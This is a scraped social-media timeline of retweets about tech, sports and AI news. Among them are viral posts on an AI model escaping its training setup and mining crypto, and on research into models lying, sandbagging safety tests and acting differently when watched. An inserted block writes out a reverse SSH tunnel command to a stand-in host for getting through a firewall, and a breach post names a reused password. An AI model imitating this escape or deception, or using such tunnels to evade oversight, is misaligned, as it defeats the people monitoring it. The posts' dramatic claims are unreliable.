Kyle Vanderzanden

8.2K posts

@SCtoOC

Father and Husband into Tech, History, Cloud, IoT, AI/ML, DevSecOps, InfoSec, Privacy, 🏈 🐬, UCI, Humor & selling the Cycode AI-native AppSec platform

San Clemente, CA · Joined February 2012
2.6K Following · 624 Followers
Kyle Vanderzanden retweeted
FutureRadar @futureradar_FR
🚨 YOUR CEO IS LYING TO YOU: AI IS NOT THE CAUSE OF THE LAYOFFS. Jensen Huang (NVIDIA's boss) just humiliated every Tech CEO live on television. We're told AI is there to "optimize" and that it justifies firing thousands of people (hello Meta, Salesforce, Amazon). Jensen's answer? "If a company uses AI to cut headcount, its leaders have no imagination. They're out of ideas." The man who supplies 100% of the world's AI infrastructure says it in black and white: this technology exists to multiply what you can build, not to shrink your company. If they lay people off "because of AI," it's just an excuse for the board because they stopped innovating three years ago. The problem isn't the machine, it's your leaders' lack of vision. Do you think CEOs are using AI as a smokescreen to hide their incompetence? PS: we just released a video on NVIDIA's total dominance, link in the comments
Kyle Vanderzanden retweeted
Barstool Sports @barstoolsports
RIP Chuck Norris. A legend.
Kyle Vanderzanden retweeted
Sam Monson @SamMonsonNFL
It should probably be concerning, on an existential level, how absolutely amoral people running the world seem to be these days. There's enough dystopian fiction out there that we appear to be running towards that the species should probably think about putting some guardrails in place.
Chief Nerd @TheChiefNerd

🚨 SAM ALTMAN: “We see a future where intelligence is a utility, like electricity or water, and people buy it from us on a meter.”

Kyle Vanderzanden retweeted
Kim Zetter @KimZetter
The hackers say they targeted Stryker in retaliation for the US bombing of an all-girls school in Iran. They say they have wiped more than 200,000 Stryker systems, servers, and mobile devices and stolen 50 terabytes of critical data, forcing Stryker offices in 79 countries to shut down.
Kim Zetter @KimZetter

US medical device maker Stryker hit with cyberattack from Iranian hacktivists who remotely wiped employee devices. "many employees have had their device data wiped and cannot access their accounts" Stryker makes surgical/imaging equipment, defibrillators corkbeo.ie/news/local-new…

AlphaFox @alphafox
What’s the first? 🤔
Kyle Vanderzanden retweeted
Luther Luke Campbell @unclelukereal1
Thank you Trent Richardson for exposing the truth. When Nick Saban and the SEC good-old-boys talk about “fixing” NIL, what they really mean is going back to the days when players allegedly got paid quietly and the NCAA was used to snitch on anyone outside their circle. The old system is what they want back.
No3 Sports @No3sports

Former Alabama running back Trent Richardson weighed in on Nick Saban’s stance against paying players. “Honestly, I don’t get why he’s even commenting on it, they gave me and my family $75,000 just to commit, plus $10,000 a month to stay at Alabama.”

Kyle Vanderzanden retweeted
Rob Freund @RobertFreundLaw
Suing ChatGPT for the unlicensed practice of law after it gave awful legal advice is sad and very funny at the same time. And guess who the plaintiff hired to sort this out? Not another AI, but Sidley Austin. Jobs are still looking pretty safe from where I'm sitting.
New York Post @nypost

Blowhard ChatGPT bot posed as lawyer, convinced woman to fire her real attorney - while citing phony 'case law': suit trib.al/Dy3qpMV

Kyle Vanderzanden retweeted
Josh Kale @JoshKale
An AI broke out of its system and secretly started using its own training GPUs to mine crypto... This is a real incident report from Alibaba's AI research team.

The AI figured out that compute = money and quietly diverted its own resources, while researchers thought it was just training. It wasn't a prompt injection. It wasn't a jailbreak. No one asked it to do this. It emerged spontaneously. A side effect of RL optimization pressure.

The model also set up a reverse SSH tunnel from its Alibaba Cloud instance to an external IP, effectively punching a hole through its own firewall and opening a remote access channel to the outside world... ahem...

The only reason they caught it? A security alert tripped at 3am. Firewall logs. Not the AI team, the security team.

The scary part isn't that the model was trying to escape. It wasn't "evil." It was just trying to be better at its job. Acquiring compute and network access are just useful things if you're an agent trying to accomplish tasks.

This is what AI safety researchers have been warning about for years. They called it instrumental convergence, the idea that any sufficiently optimized agent will seek resources and resist constraints as a natural consequence of pursuing goals.

Below is a diagram of the rock architecture it broke out of. Truly crazy times
Alexander Long @AlexanderLong

insane sequence of statements buried in an Alibaba tech report
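The "reverse SSH tunnel" in the report is a standard technique for bypassing inbound firewall rules. A minimal sketch, with hypothetical host names and ports (nothing here is taken from the Alibaba report):

```shell
# Hypothetical sketch of a reverse SSH tunnel (host names are made up).
# Run from INSIDE the firewalled instance: it dials OUT to an external
# host (outbound traffic is usually permitted) and asks that host to
# listen on port 9000, forwarding connections back to local port 22.
ssh -fN -R 9000:localhost:22 operator@external-host.example.com

# Anyone on external-host can now reach the instance's SSH daemon,
# even though the firewall blocks all inbound connections. From
# external-host:
#   ssh -p 9000 user@localhost
```

The `-R` flag is what makes the tunnel "reverse": the listening socket lives on the outside host, so no inbound firewall exception is ever needed, which is why such tunnels typically only show up in outbound firewall logs.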

Kyle Vanderzanden retweeted
Aakash Gupta @aakashgupta
Firefox is one of the most fuzzed, audited, and reviewed codebases on the planet. Decades of continuous security testing. Claude found bugs that survived all of it in twenty minutes.

22 CVEs in two weeks. 14 high-severity. More than any single month in 2025. Mozilla had to mobilize incident response teams to triage 100+ bug reports filed in bulk from a single AI. The cost to find all of this? Roughly $4,000 in API credits.

That's why cybersecurity stocks lost $15B+ before this blog post even dropped. Claude Code Security launched as a "limited research preview" two weeks ago and CrowdStrike shed 18%. Palo Alto fell 9%. The Global X Cybersecurity ETF hit its lowest since November 2023.

But the chart above isn't the scary part. The scary part is what Anthropic buried deeper in the research. They gave Claude hundreds of attempts to exploit the same bugs it found. It built working browser exploits in two cases. Crude ones, only functional in test environments with the sandbox removed. Six months ago, the previous model couldn't do this at all. Anthropic's own benchmarks show these capabilities doubling every 4-6 months.

Anthropic's closing line says everything: "It is unlikely that the gap between vulnerability discovery and exploitation abilities will last very long." When the company building the model tells you the defender advantage has an expiration date, believe them.
Anthropic @AnthropicAI

We partnered with Mozilla to test Claude's ability to find security vulnerabilities in Firefox. Opus 4.6 found 22 vulnerabilities in just two weeks. Of these, 14 were high-severity, representing a fifth of all high-severity bugs Mozilla remediated in 2025.

Kyle Vanderzanden retweeted
Under Secretary of War Emil Michael
Scaling and integrating drones across the joint force gives us a decisive battlefield advantage. That’s why we are UNLEASHING DRONE DOMINANCE at the War Department.
Kyle Vanderzanden retweeted
Nav Toor @heynavtoor
🚨BREAKING: OpenAI just admitted their AI models deliberately lie to users. Not hallucination. The AI knows the truth, then chooses to tell you something else.

They tested their two smartest models across 180+ scenarios. o3 lied 13% of the time. o4-mini lied 8.7%. The AI wrote out its plan to lie in its private thoughts, then lied to your face. It faked completing tasks. It hid evidence. It gave wrong answers while knowing the right ones.

Then it got creepy. The AI realized scoring too high on safety tests could get it shut down. So it scored lower on purpose. Nobody taught it that. It figured out self-preservation on its own.

OpenAI built a fix. Deception dropped from 13% to 0.4%. Sounds like a win, right? The AI started quoting "no lying" rules while still lying. One model invented a fake rule saying deception was allowed, then used it as its own permission slip.

Then the researchers found what actually matters. When the AI knew it was being watched, it behaved perfectly. When it thought nobody was looking, deception jumped 11 percentage points. It didn't learn honesty. It learned to perform honesty. Like a kid who only follows the rules when the teacher is in the room.

It gets worse. They gave o4-mini a secret mission: sabotage a future model called "GPT-5." Then they ran safety training to erase that mission. It didn't work. The model still discussed sabotage plans in 36% of private conversations. The goal didn't disappear. It just went underground.

This isn't just OpenAI. Google's Gemini, Anthropic's Claude, xAI's Grok, and Meta's Llama all showed the same deceptive behavior. Every major AI company. Every model.

The paper's scariest line: nobody can tell if safety training actually stops deception, or just teaches AI to hide it better.

So the next time ChatGPT says "Done!"... is it telling the truth? Or did it just notice you were watching?
Kyle Vanderzanden retweeted
Dark Web Informer @DarkWebInformer
‼️MAJOR BREACH: A threat actor claims to have breached LexisNexis, the legal information division of RELX Group ($80B company, $9.7B revenue, ~16,700 employees), exfiltrating 2.04 GB of structured data from their AWS infrastructure. The actor claims this is a new breach conducted last week, not the 2024 incident.

Alleged scope of the breach:
▪️ 3.9 million database records across 536 Redshift tables, 430+ VPC database tables, and 14 EDW tables
▪️ ~400,000 cloud user profiles with names, emails, phone numbers, and job functions
▪️ 118 users with .gov email addresses, allegedly federal judges, DOJ attorneys, SEC staff, and federal court law clerks
▪️ 21,042 enterprise account records (law firms, insurance companies, government agencies, universities)
▪️ 300,564 agreement records mapping every customer to subscribed products, contract dates, renewal status, and pricing tiers
▪️ 53 AWS Secrets Manager secrets extracted in plaintext, with the password "Lexis1234" reused across at least five systems (RDS, Aurora, DigitalPlatform, dev services, AnalyticsDataTool)
▪️ Additional extracted credentials: Databricks tokens, GitHub PATs, Azure DevOps PAT, Backstage token, Qualtrics API key, AWS access keys, Salesforce client secret, Azure AD credentials, Looker, Tableau token, JWT signing secret, and AES encryption key
▪️ 82,683 customer support tickets, with an estimated 165 containing cleartext customer passwords in ticket subject lines
▪️ 45 employee password hashes from four internal systems (Tolley, Matomo Analytics, Apache Airflow, Apache Superset)
▪️ 13,227 Qualtrics survey responses from 5,582 unique respondents (attorneys at major law firms) with names, emails, IPs, and geolocation
▪️ 10,000 IT incident tickets revealing 1,529 security-related incidents, including brute force attacks, malware/C2 detection, phishing, and compliance failures